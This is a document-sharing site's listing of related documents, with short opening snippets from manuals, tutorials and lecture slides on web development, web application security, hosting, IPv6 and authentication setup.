Apple URL Scheme Reference Apple URL Scheme Reference Contents About Apple URL Schemes 4 At a Glance 4 Composing Items Using Mail 4 Starting a Phone or FaceTime Conversation 4 Specifying Text Messages 5 Opening Locations in Maps

More information

shweclassifieds v 3.3 Php Classifieds Script (Joomla Extension) User Manual (Revision 2.0)

shweclassifieds v 3.3 Php Classifieds Script (Joomla Extension) User Manual (Revision 2.0) shweclassifieds v 3.3 Php Classifieds Script (Joomla Extension) User Manual (Revision 2.0) Contents Installation Procedure... 4 What is in the zip file?... 4 Installing from Extension Manager... 6 Updating

More information

Web application security

Web application security Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0

More information

Symfony 2 Tutorial. Model. Neues Bundle erstellen: php app/console generate:bundle --namespace=blogger/blogbundle

Symfony 2 Tutorial. Model. Neues Bundle erstellen: php app/console generate:bundle --namespace=blogger/blogbundle Symfony 2 Tutorial Neues Bundle erstellen: php app/console generate:bundle --namespace=blogger/blogbundle Eintrag erfolgt in app/appkernel.php und app/config/routing.yml. Model Available types: array,

More information

UNIX Web Hosting Support Documentation

UNIX Web Hosting Support Documentation UNIX Web Hosting Support Documentation Web Hosting Basics Control Panel Access your Control Panel at http://your-domain-name.com/stats/ to change your password, setup your e-mail accounts, administer your

More information

Web Application Security. Srikumar Venugopal S2, Week 8, 2013

Web Application Security. Srikumar Venugopal S2, Week 8, 2013 Web Application Security Srikumar Venugopal S2, Week 8, 2013 Before we start Acknowledgements This presentation contains material prepared by Halvard Skogsrud, Senior Software Engineer, Thoughtworks, Inc.

More information

IPv6 ISP Enabled Specification

IPv6 ISP Enabled Specification IPv6 Enabled Program V1.0.1 (2010-09) IPv6 Forum http://www.ipv6forum.com IPv6 FORUM 1 IPv6 Enabled Program MODIFICATION RECORD Version 1.0.1. Sep 7, 2010 Add the script sample and the description of a

More information

MODx Web Development. Antano Solar John. Chapter No. 5 "Authentication and Authorization"

MODx Web Development. Antano Solar John. Chapter No. 5 Authentication and Authorization MODx Web Development Antano Solar John Chapter No. 5 "Authentication and Authorization" In this package, you will find: A Biography of the author of the book A preview chapter from the book, Chapter No.

More information

Setup Citrix Access Gateway Enterprise Edition (NetScaler) for use of multiple authentication methods.

Setup Citrix Access Gateway Enterprise Edition (NetScaler) for use of multiple authentication methods. Nordic Edge One Time Password (OTP Server) has a comprehensive RADIUS support, including support for multiple authentication methods. This means that the end user can choose authentication method: SMS,

More information

Big Bad Moodle Guide By Mike Tupker mtupker@mtmercy.edu Version 1

Big Bad Moodle Guide By Mike Tupker mtupker@mtmercy.edu Version 1 Big Bad Moodle Guide By Mike Tupker mtupker@mtmercy.edu Version 1 Introduction. I m a Desktop Technician/Network Administrator at Mount Mercy College in Cedar Rapids Iowa. This document is a how to for

More information